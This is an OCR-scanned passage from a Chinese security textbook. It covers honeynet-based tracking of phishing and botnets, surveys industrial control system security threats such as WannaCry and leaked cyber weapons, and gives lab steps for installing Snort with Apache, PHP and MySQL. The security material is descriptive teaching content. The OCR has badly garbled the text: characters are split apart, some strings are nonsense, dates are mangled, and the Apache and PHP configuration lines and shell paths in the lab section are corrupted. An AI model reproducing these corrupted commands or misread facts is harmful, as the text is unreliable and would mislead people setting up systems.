极 大 的 偶然 性 ,我 们 只 能 期 待 钓鱼 者 能 攻陷 蜜 网 中 部 署 的 蜜 饶 主 机 ,并 在 其 上 架构 钓鱼 网 站 
或 断 开 重 定向 器 才能 对 网 络 钓鱼 攻击 进行 跟踪 和 深入 剖析 o 

4) 捕获 僵尸 网 络 

僵尸 网 络 是 近年 来 兴起 的 危害 Internet 的 重大 威胁 之 一 ,其 攻击 者 通过 各 种 途径 (如 主 
动 攻击 .邮件 病毒 .即时 通信 软件 .恶意 网 站 脚本 .特洛伊 木马 等 ) 传 播 僵尸 程序 感染 
Internet 上 的 大 量 主机 ,而 被 感染 的 主机 将 通过 一 个 控制 信道 接收 攻击 者 的 指令 ,组 成 一 个 
僵尸 网 络 。 它 的 危害 体现 在 发 动 分 布 式 拒绝 服务 攻击 、 发 送 垃圾 邮件 以 及 窃取 僵尸 主机 内 
的 敏感 信息 等 。 目 前 对 僵尸 网 络 的 研究 工作 尚 在 起 步 阶 段 , 还 并 未 有 发 现 . 跟 踪 与 抑制 大 量 
僵尸 网 络 活动 的 方法 。 与 捕获 网 络 钓鱼 相似 ,主要 依赖 受害 者 向 应 急 响 应 部 门 汇报 。 因 此 ， 
我 们 可 以 考虑 利用 在 网 络 中 部 署 恶意 软件 收集 器 ,对 收集 到 的 恶意 软件 样本 采用 蜜 网 技术 
对 其 进行 分 析 , 确 认 是 否 为 僵尸 程序 ,并 对 僵尸 程序 所 要 连接 的 僵尸 网 络 控制 信道 的 信息 进 
行 提取 ,最 后 通过 客户 端 蜜 饶 技 术 伪装 成 被 控制 的 僵尸 工具 ,进入 僵尸 网 络 进行 观察 和 跟 
踪 。 在 高 度 可 控 的 蜜 网 框架 内 ,甚至 能 对 抗 虚拟 环境 的 僵尸 程序 ,如 Agobot ,利用 一 系列 的 
数据 捕获 和 分 析 工 具 对 其 网 络 进行 分 析 。 

蜜 网 技术 是 一 种 通过 构建 高 度 可 控 的 网 络 结构 ,并 结合 一 系列 数据 控制 .捕获 和 分 析 工 
具 , 使 得 安全 研究 人 员 能 更 深入 地 了 解 各 种 攻击 行为 的 新 技术 。 本 节 从 目前 Internet "PUL 
大 安全 威胁 入 手 ,探讨 了 利用 蜜 网 技术 进行 安全 防御 的 可 能 性 。 巾 于 这 项 技术 尚 在 研究 测 
试 阶段 ,并 且 已 拓展 到 其 他 研究 方向 (如 动态 蜜 饶 、 蜜 场 .Honeytoken 等 ), 同 时 蜜 网 技术 存 
在 部 署 和 配置 复杂 等 缺陷 ,这 就 需要 我 们 不 断 地 研究 、 实 践 和 完善 ,使 得 蜜 网 技术 能 更 好 地 
被 安全 研究 人 员 用 以 深入 剖析 网 络 安全 威胁 。 
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6.1.5 工业 信息 安全 简介 


1. 工业 信息 安全 的 内 涵 

当前 ,以 移动 互联 网 、 云 计算 、 大 数据 、 物 联网 和 人 工 智能 等 为 代表 的 新 一 代 信息 技术 与 
制造 技术 加 速 融 合 , 推 动 着 制造 业 向 数字 化 、 网 络 化 .智能 化 、 服 务 化 方向 发 展 ,成 为 推动 经 
济 转型 升级 .新旧 发 展 动能 接续 转换 的 强劲 引擎 。 新 一 代 信 息 技 术 在 加 速 信息 化 与 工业 化 
深度 融合 发 展 的 同时 ,也 带 来 了 日 趋 严 峻 的 信息 安全 问题 。 工 业 信 息 化 、 自 动 化 网 络 化 、 智 
能 化 等 基础 设施 是 工业 的 核心 组 成 部 分 ,是 工业 各 行业 、 企 业 的 神经 中 枢 。 工 业 信息 安全 的 
核心 任务 是 要 确保 这 些 工业 神经 中 枢 的 安全 。 工 业 信 息 安 全 事 关 经 济 发 展 .社会 稳定 和 国 
家 安全 ,是 网 络 安全 的 重要 组 成 。 

从 内 容 方 面 看 ,工业 信息 安全 泛 指 工业 运行 过 程 中 的 信息 安全 ,涉及 工业 领域 中 的 各 个 
环节 ,包括 工业 控制 系统 信息 安全 (以 下 简称 工控 安全 )、 工 业 互 联网 安全 .工业 大 数据 安全 、 
工业 云 安全 .工业 电子 商务 安全 等 内 容 。 

从 工业 信息 安全 发 展 趋势 方面 看 ,在 传统 工业 时 期 ,生产 环境 相对 封闭 ,工业 信息 安全 
的 重点 在 于 工控 安全 。 近 年 来 , 随 着 “互联 网 十 ”智能 制造 等 新 兴 产 业 的 快速 发 展 ,互联 网 
快速 渗透 到 工业 领域 的 各 个 环节 ,工业 互联 网 安全 逐渐 成 为 工业 信息 安全 的 重点 和 核心 , 工 
业 信 息 安全 从 面向 企业 端的 工控 安全 逐步 延伸 至 工业 互联 网 安全 ,工业 云 安 全 ,工业 大 数据 
安全 等 领域 。 

从 保障 对 象 上 看 ,工业 信息 安全 要 保障 工业 系统 和 设备 (如 工业 控制 系统 )、 工 业 互 联网 
平台 (包括 承载 平台 运行 的 工业 云 以 及 应 用 服务 )、 工 业 网 络 基 础 设施 (基础 电信 和 网络 、 解 析 
网 络 和 其 他 接 入 网 络 ) ,工业 数据 等 的 安全 。 因 此 ,工业 信息 安全 不 仅 涉及 传统 计算 机 网 络 
和 信息 系统 安全 ,还 涉及 工业 软 硬 件 设备 .控制 系统 .工业 协议 等 的 安全 。 

与 传统 的 计算 机 网 络 安全 相 比 ,工业 信息 安全 在 保障 对 象 .安全 需求 ,网 络 和 设备 环境 、 
通信 协议 等 方面 有 其 特殊 性 。 例 如 ,工业 信息 安全 的 目的 是 确保 工业 (产业 ) 发 展 安全 ,其 保 
护 对 象 包括 物理 系统 一 一 各 种 各 样 的 工业 生产 系统 、 工 业 软 硬件 产品 等 ,其 安全 需求 侧重 于 
生产 或 运行 过 程 的 可 靠 性 ,生产 环境 软 硬 件 种 类 与 技术 手段 繁多 ,协议 通用 性 低 , 难 以 统一 ， 
传统 的 互联 网 安全 保障 体系 难以 全 面 覆盖 ,因此 需要 建立 更 专业 的 工业 信息 安全 保障 体系 。 

2. 工业 信息 安全 的 总 体态 势 和 特征 

当前 ,全 球 范围 内 工业 信息 安全 整体 形势 不 容 乐观 ,暴露 在 互联 网 上 的 工业 控制 系统 及 
设备 数量 不 断 增多 ,工控 安全 高 危 漏 洞 频 现 ,针对 工控 系统 实施 网 络 攻击 的 门槛 进一步 降 
低 , 重 大 工业 信息 安全 事件 仍 处 于 高 发 态势 。 随 着 工业 互联 网 、 智 能 制造 、 物 联网 等 的 深入 
发 展 ,工业 信息 安全 形势 更 加 严峻 、 复 杂 。 

(1) 暴露 在 互联 网 上 的 工控 系统 及 设备 有 增 无 减 。 

随 着 工业 生产 环境 对 管理 和 控制 一 体 化 需求 的 不 断 升 级 ,以 及 网 络 、 通 信 等 信息 技术 的 
广泛 深入 应 用 , 越 来 越 多 的 工控 系统 与 企业 网 中 运行 的 管理 信息 系统 之 间 实 现 了 互联 、 互 
通 、 互 操作 ,甚至 可 以 通过 互联 网 、 移 动 互联 网 等 直接 或 间接 地 访问 ,导致 攻击 者 可 从 研发 
端 ,管理 端 .消费 端 .生产 端 任意 一 端 实现 对 工控 系统 的 攻击 或 病毒 传播 。 

(2) 工业 信息 安全 高 危 漏 洞 层出不穷 。 

随 着 工业 信息 安全 越 来 越 受 到 各 界 重 视 ,工业 信息 安全 漏洞 被 大 量 披露 出 来 ,总 体 呈 现 
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数量 不 断 增 加 ,漏洞 类 型 多 样 ,危害 等 级 高 ,行业 领域 分 布 广泛 以 及 漏洞 不 能 被 及 时 修补 等 
特点 。 工 业 信息 安全 漏洞 数量 连年 呈现 高 发 态势 , 约 半 数 以 上 的 工业 信息 安全 漏洞 均 为 高 
危 漏洞 。 另 外 ,披露 的 漏洞 类 型 呈现 多 样 化 特征 ,包括 权限 管理 .认证 许可 、 资 源 管理 、 缓 冲 
区 溢出 、 密 码 与 加 密 问题 、 信 息 泄露 .不 受 控 搜索 路 径 元 素 、SQL 注入 .目录 遍历 、 硬 编码 、 安 
全 性 能 、 拒 绝 服务 、 跨 站 点 请 求 . 中 间 人 、DLL 劫持 等 ,共有 30 余 种 漏洞 类 型 。 其 中 ,权限 管 
理 、 认 证 许可 、 资 源 管理 .缓冲 区 溢出 、 密 码 与 加 密 、 信 息 泄露 等 漏洞 类 型 数量 相对 较 多 。 对 
业务 连续 性 、 实 时 性 要 求 高 的 工控 系统 来 说 ,无 论 是 利用 这 些 漏 洞 造成 业务 中 断 、 获 得 控制 
权限 ,还 是 窃取 敏感 生产 数据 ,都 将 对 工控 系统 造成 极 大 的 安全 威胁 。 同 时 ,工业 信息 安全 
漏洞 广泛 分 布 在 关键 制造 .能 源 、 水 务 .交通 运输 .医疗 .化 工 等 重点 领域 。 而 相应 的 工业 信 
息 安 全 漏洞 的 修复 进度 较为 迟缓 。 究 其 原因 在 于 ,一 方面 供应 商 漏洞 修复 工作 的 优先 级 别 
较 低 ,还 要 受到 软件 开发 迭代 周期 的 限制 ; 男 一 方面 ,工业 企业 出 于 维持 业务 连续 性 、 稳 定性 
的 考虑 ,及 时 更 新 和 安装 补丁 的 积极 性 不 高 。 

(3) 工控 系统 攻击 难度 逐渐 降低 。 

针对 工控 系统 的 安全 研究 与 日 俱 增 ,大 量 工控 安全 漏洞 攻击 方法 可 通过 互联 网 等 多 种 
公开 或 半 公 开 渠 道 扩 散 , 极 易 被 黑客 等 不 法 分 子 获取 利用 ,对 工控 系统 的 入 侵 攻 击 已 不 再 神 
秘 , 攻 击 工控 系统 的 难度 逐渐 降低 , 究 其 原因 有 以 下 几 个 方面 。 

一 是 黑客 有 目的 地 针对 工控 系统 的 探测 发 现 变 得 更 加 容易 。 目 前 ,黑客 可 通过 至 少 3 
种 方式 发 现 工控 系统 和 产品 ,包括 : 四 通过 百度 .谷歌 等 网 页 搜索 引擎 检索 工控 产品 Web 
发 布 的 URL 地 址 。 回 通过 Shodan 等 主机 搜索 引擎 检索 工控 系统 软 硬 件 的 HTTP/SNMP 
等 传统 网 络 服务 端口 关键 指纹 信息 。@ 通 过 在 线 监 测 平台 匹配 工控 通信 私有 协议 端口 网 络 
指纹 特征 发 现 正在 运行 的 工控 软 硬 件 设备 。 

二 是 工控 系统 软 硬 件 设备 漏洞 .密码 等 信息 获取 渠道 变 得 更 加 便利 。 一 方面 ,黑客 组 织 
公开 披露 了 大 量 安全 漏洞 等 敏感 信息 , 易 被 攻击 者 利用 并 引发 工业 信息 安全 事件 。 例 如 , 震 
惊 全 球 的 WannaCry 勒索 病毒 就 是 利用 了 黑客 组 织 “ 影 子 经 纪 人 ”披露 的 “永恒 之 蓝 ” 漏 洞 
进行 传播 ,给 工控 系统 造成 巨大 危害 。 另 一 方面 ,大 量 工控 系统 产品 信息 被 曝光 在 互联 网 
上 。 例 如 ,SCADAPass 默认 密码 清单 事件 使 全 球 48 家 工控 厂商 的 134 个 工控 设备 型 号 的 
设备 类 型 .默认 用 户 名 及 密码 、 网 络 端口 .通信 协议 与 服务 等 敏感 信息 被 公 诸 于 众 。 攻 击 者 
可 能 利用 该 清单 中 的 默认 密码 获取 工控 设备 的 操作 权限 ,引发 安全 事件 。 

三 是 工控 系统 攻击 工具 和 入 侵 细节 获取 途径 变 得 更 加 多 源 。 维 基 解 密 等 网 络 媒 体 公开 
披露 了 大 批 网 络 攻击 工具 和 入 侵 细 节 , 开 发 者 社区 以 及 安全 研究 人 员 也 会 发 布 大 量 技 术 分 
析 报 告 。 

(4) 重大 工业 信息 安全 事件 频 发 。 

近年 来 ,全 球 工业 领域 发 生 的 信息 安全 事件 愈 发 频繁 ,事件 数量 高 居 不 下 ,事件 波及 范 
围 不 断 扩大 ,造成 后 果 愈 加 了 恶劣。 勒索 软件 、 分 布 式 拒绝 服务 攻击 、 恶 意 程 序 等 严重 威胁 工 
业 信 息 安全 。 

3. 工业 信息 安全 发 展 趋势 

(1) 工业 互联 网 安全 在 工业 信息 安全 保障 工作 中 的 重要 性 日 益 突出 。 

当前 ,工业 互联 网 已 成 为 工业 转型 升级 的 主要 趋势 和 方向 。 一 方面 ,政府 部 门 高 度 重 
视 , 纷 纷 出 台 相 关 政 策 促进 工业 互联 网 发 展 。 另 一 方面 ,产业 界 积极 响应 ,推动 工业 互联 网 
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产业 发 展 。 与 此 同时 ,工业 互联 网 安全 问题 日 益 凸显 。 

首先 ,漏洞 、 病 毒 等 传统 网 络 威胁 将 进一步 向 工业 互联 网 渗透 。 例 如 ,2018 年 1 月 3 
日 ,谷歌 公司 安全 团队 披露 “熔断 ”和 “幽灵 ”漏洞 ,英特尔 (Intel)、 美 国 超 微 半 导体 公司 
(AMD) 等 厂商 的 主流 中 央 处 理 器 (CPU) 受 到 影响 。 该 漏洞 打破 了 云 平台 基于 虚拟 化 隔离 
技术 的 安全 假设 ,任何 虚拟 机 的 租户 或 者 不 法 分 子 可 以 利用 漏洞 跨 账户 、 跨 虚拟 机 窃取 其 他 
用 户 资料 ,工控 系统 及 工业 互联 网 平台 正面 临 严重 威胁 。 

其 次 , 云 计算 、 大 数据 等 新 技术 将 给 工业 互联 网 带 来 新 的 安全 风险 。 在 云 环 境 下 ,工业 
互联 网 安全 风险 跨 域 传 播 的 级 联 效 应 将 愈 发 明显 。 工 业 大 数据 是 工业 互联 网 创新 发 展 的 引 
擎 ,具有 重要 价值 , 愈 发 成 为 黑客 窃取 数据 资料 的 重要 目标 ,采集 存储、 传输 .分 析 、 应 用 等 
数据 全 生命 周期 都 将 面临 泄露 或 被 算 改 的 安全 风险 。 此 外 ,新 技术 的 集成 应 用 将 会 引入 技 
术 本 身 的 安全 隐患 ,给 工业 互联 网 带 来 新 的 安全 风险 。 

最 后 ,工业 互联 网 安全 是 工业 信息 安全 的 重要 组 成 部 分 ,将 是 未 来 工业 信息 安全 工作 的 
重 中 之 重 。 工 业 互 联网 安全 关系 工业 生产 和 工业 发 展 ,更 关系 着 社会 稳定 和 国家 安全 ,其 重 
要 性 日 益 凸 显 。 然 而 ,目前 普遍 存在 重 发 展 轻 安全 的 现象 ,工业 互联 网 安全 滞后 于 发 展 步 
伐 ,安全 防护 能 力 不 足 ,难以 及 时 有 效 地 应 对 新 的 安全 风险 , 亟 须 高 度 重 视 工 业 互 联网 安全 
保障 工作 ,建立 健全 工业 互联 网 安全 保障 体系 迫在眉睫 。 

(2) 工控 系统 日 益 成 为 黑客 攻击 和 网 络 战 的 重要 目标 。 

工控 系统 作为 工业 生产 的 “神经 中 枢 ”, 关 系 人 民生 命 财 产 安全 、 社 会 稳定 ,甚至 国家 安 
全 。 工 控 系统 日 益 成 为 黑客 和 网 络 战 的 重点 攻击 目标 是 多 方面 因素 共同 导致 的 结果 。 首 
先 , 工 控 系 统 的 重要 性 决定 了 其 必然 成 为 黑客 攻击 和 网 络 战 的 首要 攻击 目标 。 当 前 ,网 络 空 
间 博 弈 越 来 越 激烈 ,网 络 空间 日 益 成 为 各 国 实施 对 抗 的 主要 战场 ,具有 重要 地 位 的 工控 系统 
不 可 避免 地 成 为 各 国 黑 客 组 织 实施 攻击 破坏 的 重点 对 象 。 其 次 ,工控 系统 自身 的 脆弱 性 ,如 
存在 大 量 安全 漏洞 以 及 缺乏 必要 的 安全 防护 机 制 ,为 黑客 成 功 人 侵 工 控 系统 提供 可 能 。 针 
对 工控 系统 的 恶意 软件 ,病毒 等 数量 持续 攀升 ,为 黑客 实施 入 侵 提 供 了 必要 的 入侵 工具 。 青 
次 ,工业 互联 网 加 速 发 展 ,工控 系统 的 开放 互 连 为 黑客 从 外 部 互联 网 和 侵 工 控 系统 提供 了 更 
多 攻击 路 径 。 

(3) 大 批 网 络 武器 泄露 降低 工业 系统 攻击 门槛 。 

当前 ,网 络 武器 泄露 及 其 对 工业 系统 产生 的 影响 呈现 以 下 特点 和 趋势 。 一 是 泄露 的 网 
络 武器 及 泄露 网 络 武器 的 黑客 组 织 越 来 越 多 。2017 年 3 一 12 月 ,维基 解密 已 持续 泄露 了 共 
计 24 Jit CIA( 中 央 情 报 局 ) 机 密 文 档 , 其 中 大 部 分 是 网 络 武器 ,包括 恶意 程序 病毒. 木马 有 
攻击 性 的 零 日 漏洞 .恶意 程序 远程 控制 系统 和 相关 文件 。 除 此 之 外 ,黑客 组 织 “ 影 子 经 纪 人 ” 
也 在 2016—2017 年 陆续 曝光 NSA 使 用 的 Windows 系统 高 危 漏洞 工具 的 攻击 脚本 。 二 是 
将 泄露 的 网 络 武 器 转 为 可 实施 具体 攻击 的 入 侵 工具 的 时 间 大 大 缩短 。2017 4E 5 H 12 日， 
利用 泄露 的 美国 NSA 网 络 武器 “永恒 之 蓝 ” 的 勒索 病毒 WannaCry 在 全 球 范围 内 爆发 , 短 短 
数 小 时 之 内 攻击 了 150 多 个 国家 和 地 区 的 30 多 万 台 计 算 机 ,全 球 多 个 知名 工业 设施 遭受 感 
染 而 出 现 故 障 。 短 短 一 个 月 后 ,同样 利用 “永恒 之 蓝 ” 漏 洞 的 Petya 勒索 病毒 对 乌克兰 政府 
机 关 等 实施 了 入 侵 。 由 此 可 见 , 黑 客 组 织 可 利用 泄露 的 网 络 武器 快速 进行 二 次 开发 ,研制 出 
新 的 网 络 病毒 和 攻击 工具 .这 将 给 工业 信息 安全 带 来 重大 安全 隐患 。 
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(4) Ay Mcd E np s v P Fu A nod: SES AG 7r 5x H WEG. 

近年 来 ,全球 勒索 软件 攻击 事件 高 发 ,当前 勒索 软件 呈 爆 炸 式 增 长 ,甚至 已 经 形成 比较 
完整 的 地 下 黑色 产业 链 , 不 法 分 子 在 商业 利益 驱使 下 ,将 勒索 软件 与 最 新 网 络 武 器 相 结 合 ， 
对 全 球 进 行 大 范围 无 差别 的 攻击 ,具备 更 大 的 杀伤 力 ,安全 威胁 进一步 发 酵 。 在 匿名 网 络 
“ 暗 网 ”和 虚拟 货币 “比特 币 ? 的 加 持 下 ,勒索 软件 黑色 产业 链 逐 渐 成 熟 ,威胁 将 持续 发 酵 。 匿 
名 网 络 “ 暗 网 ”的 存在 使 得 勤 索 软件 极 易 获 取 传递 且 复 制 成 本 低廉 ,比特 币 等 虚拟 货币 的 成 
熟 使 黑客 进行 勒索 交易 的 过 程 变 得 更 加 隐蔽 且 难 以 追踪 ,勒索 软件 获得 了 迅速 滋生 蔓延 的 
温床 。 与 此 同时 ,勒索 软件 已 经 形成 了 工程 化 和 组 织 化 的 地 下 黑色 产业 链 , 针 对 软件 开发 、 
购买 ,分 发 .实施 攻击 赎金 交 付 、 套 现 的 全 过 程 都 有 了 一 套 较为 完整 的 商业 模式 ,大 大 降低 
了 不 法 分 子 利用 勒索 软件 发 起 攻击 的 门槛 。 除 此 之 外 ,2017 年 发 生 的 恶意 软件 Industroyer 
可 对 电力 工控 系统 实施 定向 攻击 、 僵 尸 网 络 IoT_reaper 大 范围 感染 物 联网 设备 等 事件 充分 
表明 ,定向 攻击 ,僵尸 网 络 攻击 等 新 型 攻击 方式 将 严重 威胁 工业 信息 安全 。 

(5) 企业 安全 投入 有 望 进一步 加 大 ,给 工业 信息 安全 产业 带 来 良好 的 发 展 机 遇 。 

在 日 益 复杂 严峻 的 工业 信息 安全 形势 下 ,工业 信息 安全 愈 发 受到 政府 与 产业 界 的 关注 ， 
各 行业 针对 工业 信息 安全 防护 的 资金 投入 不 断 加 大 ,预计 未 来 工业 信息 安全 产业 将 加 速 
发 展 。 


6.2 ”入侵 检测 实验 


实验 器 材 


Snort 软件 系统 ,1 套 。 
PC(Windows XP/Windows 72.1 £. 


预习 要 求 


(1) 做 好 实验 预习 ,复习 入 侵 检测 技术 的 有 关内 容 。 
(2) 熟悉 Snort 软件 的 使 用 方法 。 

(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 


实验 任务 

通过 本 实验 ,安装 并 运行 一 个 Snort 系统 , 且 了 解 和 侵 检测 系统 的 作用 和 功能 。 
实验 环境 

装 有 Windows XP/Windows 7 操作 系统 的 PC 一 台 。 

预备 知识 

入 侵 检 测 原 理 。 
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实验 步 又 

1. 需要 的 组 件 及 其 功能 

以 下 是 本 实验 涉及 的 各 组 件 的 功能 介绍 。 

(1) Winpcap: Windows 环境 下 的 捕获 网 络 数 据 包 驱动 程序 库 , 下 载 地 址 为 http:// 
www. winpcap. org/ 。 

(2) Snort: 人 侵 检测 主 程序 ,网 站 提供 Windows 下 的 安装 版 本 ,可 以 直接 下 载 安 装 , 源 
代码 在 Linux 下 可 以 直接 编译 生成 ,Windows 下 使 用 Visual Studio 系列 的 编译 器 ,在 工程 
设置 中 ,将 几 个 预 处 理 设 置 为 禁止 ,可 以 编译 通过 ,同时 需要 下 载 Snort 规则 。 下 载 地 址 为 
http://www. Snort. org/ , 

(3) Apache: 为 系统 提供 了 Web 服务 支持 ,下 载 地 址 为 http://www. apache. org/ 。 

(4) PHP: 为 系统 提供 了 PHP 支持 ,使 Apache 能 够 运行 PHP 程序 ,下 载 地 址 为 
http://www. php. net/ 。 

(5) MySQL: 存储 各 种 报警 事件 的 数据 库 系 统 , 下 载 地 址 为 http://www. mysql. com/ 。 

(6) ACID; ACID(Analysis Console for Intrusion Databases) 是 基于 PHP 的 入 侵 检测 
数据 库 分析 控 制 台 , 它 能 够 处 理由 各 种 人 侵 检 测 系 统 、 防 火 墙 等 安全 工具 产生 并 放 入 数据 库 
中 的 安全 事件 ,安装 PHP 就 是 为 了 使 用 ACID, 下 载 地 址 为 http://acidlab. sourceforge. net/ 。 

(7) Adodb: 是 PHP 连接 数据 库 的 组 件 , 下 载 地 址 为 http://adodb. sourceforge. net/ 。 

(8) Jpgraph: FH PHP 编写 的 基于 面向 对 象 技 术 的 图 形 显示 链接 库 ,ACID 通过 Adodb 
读 取 Snort 在 MySQL 中 产生 的 数据 ,将 分 析 结 果 显 示 在 网 页 上 ,并 使 用 Jpgraph 组 件 对 其 
进行 图 形 化 显示 分 析 。 下 载 地 址 为 http://www. aditus. nu/jpgraph/. 

2. 实验 具体 步骤 

1) 安装 Apache 服务 器 

(1) 双击 httpd-2. 2. 17-win32-x86-no_ssl. msi. 

(2) 出 现 Windows 标准 的 软件 安装 欢迎 界面 , 单 击 Next 按钮 ,出 现 授权 协议 ,选择 同 
意 授权 协议 ,然后 继续 ,出 现 安装 说 明 。 

(3) 在 Network Domain 中 填写 网 络 域名 ,如 kysf. net, 如 果 没 有 网 络 域名 ,可 以 任意 填 
BH WAY Apache 服务 器 要 放 入 Internet, 则 一 定 要 填写 正确 的 网 络 域 名 。 在 Server 
Name 中 填 人 服务 器 名 ,如 www. kysf. net, 即 主机 名 。 在 Administrator's Email Address 
中 填写 系统 管理 员 的 联系 电子 邮件 地 址 ,如 indian@163. com, ER 3 条 信息 仅 供 参考 ,其 
中 联系 电子 邮件 地 址 会 在 当 系 统 故障 时 提供 给 访问 者 ,如 图 6. 2. 1 所 示 。 

(4) 确认 安装 选项 无 误 , 如 果 要 再 检查 一 遍 , 可 以 单 击 Back 按钮 返回 检查 。 单 击 
Install 按钮 开始 安装 。 

(5) 检测 方法 : 使 用 httpd -k install 命令 将 Apache 设置 为 Windows 中 的 服务 (如 果 是 
Apache 2. 2 之 前 的 版 本 , 则 输入 apache -k install) ,如 图 6. 2. 2 所 示 。 若 选择 端口 80, 则 无 

(6) 通过 上 述 方式 ,在 DOS 或 者 浏览 器 下 运行 , 均 有 启动 成 功 显示 。 
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J Apache HTTP Server 2.2 - Installation Wizard [—x—| 


Server Information 
Please enter your server's information. 


Network Domain (e.g. somenet.com) 
jocalhost 


Server Name (e.g. www.somenet.com): 
localhost 


Administrator's Email Address (e.g. webmaster @somenet.com): 
[793144750@qq.com 


Install Apache HTTP Server 2.2 programs and shortcuts for: 


© for All Users, on Port 80, as a Service — Recommended. 
@ only for the Current User, on Port 8080, when started Manually. 


InstallShield 


EET NB ENTE Cancel 


图 621 Apache 安 装 界面 


httpd -k install 


图 622 8080 端 口 检测 界面 


选择 定制 5 默认 文件 夹 Ert ache 下 。 安 装 程序 会 在 该 文件 
-个 子 文件 夹 apache2 ok 成 安装 。 如 图 6.2. 3 所 示 ,打开 配置 文件 C:\a 
\conf\httpd. conf( 版 本 不 同 ,可 能 是 C:\apache\conf\httpd. conf) ,将 其 中 的 


JEF H ZE 
;xacheVapache2 


Listen 8080 更 


WOH Listen 50080。 这 是 由 于 Windows IIS 中 的 Web 服务 器 默认 情况 下 在 TCP 80 端口 监 
听 连 接 请 求 ,而 8080 端口 一 般 留 给 代理 服务 器 使 用 ,所 以 为 了 避免 Apache Web 服务 器 的 
监听 端口 与 其 发 生 冲 突 , 将 Apache Web 服务 器 的 监听 端口 修改 为 不 常用 的 高 端 端口 


50080。 如 果 安 装 的 时 候 ,80 端口 未 被 占用 , 则 无 须 修改 端口 。 


局 httpdconf- 记事 本 E = (5) x/ 
KIHE) HAB (E) 帮助 上 
| Change this to Listen on specific IP addresses as shown below to B 


# prevent Apache from glomming onto all bound IP addresses (0.0.0.0) 
# 


Listen 12.34.56.78:80 
Listen 50080 


# 
# Dynamic Shared Object (DS0) Support 


图 623 ”Apache 配置 界面 


单 击 “ 开 始 ”, 选 择 “ 运 行 ”, 输 入 cmd, 进 入 命令 行 方式 。 输 入 下 面 的 命令 。 
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C: V» od apacheNapache?Wbin 
C:\apache\ apache2\bin\ apache - k install 

这 是 将 apache 设置 为 Windows 中 的 服务 方式 运行 。 

在 浏览 器 中 进行 访问 时 ,使 用 http://localhost:50080/ 即 可 。 

2) 添加 Apache 对 PHP 的 支持 

(1) 解压 缩 php-5. 2. 6-Win32. zip Æ C:\php. 

(2) 复制 php5ts. dll 文件 到 %systemroot%\system32。 

(3) 复制 php. ini-dist (修改 文件 名 ) 48 %systemroot %\php. ini, 修 改 php. ini. 
extension- php gd?.911 

extension- php mysql.dll 

如 果 php. ini 有 该 句 , 则 将 此 语句 前 面 的 “;? 注 释 符 去 掉 , 如 图 6.2. 4 所 示 。 


Aj php.ini - 记事 本 = 提 |x| 


SE) Hi) festi) 帮助 中) 


;extension:php. domxml.d11 E 
;extension-php-exif.dll 


p gettext.dll 


P 
;extension=php_hyperwave .d11 
;extension=php_icony.dll 


624 FP 配置 界面 


同时 复制 C: NphpVextension 下 的 php_gd2. dll E php. mysql. dll Æ % systemroot %\. 

(4) 添加 gd 图 形 库 的 支持 ,在 C:\apache\Apache2\conf\httpd. conf 中 添加 : 

ToadMochile phpS module "C:/php5/php5apache?.d11" 

YER: apache 版 本 在 2. 2 以 上 的 要 换 成 LoadModule php5_ module " C:/php5/ 
php5apache2_2. dll" ,否则 无 法 restart, 

在 AddType application 行 下 面 加 入 下 面 两 行 信息 。 


Garype application/x- httpd- php .php -phtml .php3 .php4 

Add ype application/x- httpd- php- source .phps 

(5) 添加 好 后 ,保存 http. conf 文件 。 单 击 “ 开 始 ” 按 钮 ,选择 “运行 ”, 在 弹出 的 窗口 中 输 
入 cmd 进入 命令 行 方式 ,输入 命令 “net start apache2”, 在 Windows 中 启动 Apache 服务 ,如 
图 6.2.5 所 示 。 


lolx) 
Micro i s 2000 [-| 


U 5.00 


图 625 Apache 服 务 启动 界面 
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测试 PHP 脚本 : 

在 C:\apache2\htdocs 目录 下 新 建 test. php. 

test.php 文件 内 容 : < phpinfo (); > 

使 用 http: //localhost/test. php( 或 http://127. 0. 0. 1:50080/test. php) Wit PHP 是 
否 安装 成 功 。 

3. 安装 配置 Snort 

安装 程序 WinPcap 4 0 2. exe; 默 认 安 装 即 可 。 

版 本 一 : 安装 Snort 2 8 1 Installer. exe; 默 认 安 装 即 可 ,Snort 的 默认 安装 路 径 在 CN 
Snort. 

将 Snortrules-snapshot-CURRENT 目录 下 的 所 有 文件 复制 (全 选 ) 到 C:\Snort 目录 下 。 

将 文件 压缩 包 中 的 Snort. conf 覆盖 C:\Snort\etc\Snort. conf, 
C:\Snort。 

将 Snortrules-snapshot-CURRENT 目录 下 的 所 有 文件 复制 (全 选 ) 到 C; \Snort\rules 
目录 下 。 

文件 open-test. conf 中 会 有 Snortrules 的 规则 ,对 应 C:\Snort\etc 下 的 Snort. conf 内 
部 的 使 用 规则 ,可 以 自行 更 改 。 

4. 安装 MySQL 配置 mysql 

(1) 解压 mysql-5. 0. 51b-win32. zip, 并 安装 到 默认 文件 夹 C:\mysql。 采 取 默 认 安装 。 
设置 数据 库 实例 流程 ,如 图 6. 2.6 一 图 6. 2. 13 所 示 。 

安装 路 径 为 C:\Program Files\MySQL\MySQL Server 5. 1。 


er Instance Configuration Wizard 


MySQL Server Instance Configuration 
Configure the MySQL Server 5,0 server instance. 


626 MASQL 安 装 向 导 界 面 -1 
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MySQL Server Instance Configuration 
Configure the MySQL Server 5.0 server instance. 


图 627 MAQL 安 装 向 导 界面 -2 


rver Instance Configuration Wizard 


MySQL Server Instance Configuration 
Configure the MySQL Server 5.0 server instance. 


628 MA 安装 向 导 界 面 -3 
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Server Instance Configuration Vizard 


MySQL Server Instance Configuration 
Configure the MySQL Server 5.0 server instance. 


图 629 MAQL 安 装 向 导 界 面 -4 


MySQL Server Instance Configuration Wiraré 


MySQL Server Instance Configuration 
Configure the MySQL Server 5.0 server instance. 


图 6210 MA 安装 向 导 界 面 -5 
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Server Instance Configuration Tizard 


MySQL Server Instance Configuration 
Configure the MySQL Server 5.0 server instance. 


图 6211 MSQ 安装 向 导 界面 -6 


BySQL Server Instance Configuration Wizard 


MySQL Server Instance Configuration 
Configure the MySQL Server 5.0 server instance. 


erver automa 


图 6212 MASQL 安 装 向 导 界面 -7 
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|. MySQL Server Instance Configuration 
Configure the MySQL Server 5.0 server instance. 


图 6213 MA 安装 向 导 界 面 -8 


(2) 在 命令 行 方 式 下 输入 net start mysql, 启 动 mysql 服务 ,显示 “请 求 的 服务 已 经 
启动 ”。 

G) 注意 设置 root 账号 和 密码 ,并 在 命令 行 方式 下 进入 C:\mysql\bin, 输 入 下 面 的 
命令 。 


C:\mysql\bin\mysql -nt -install 
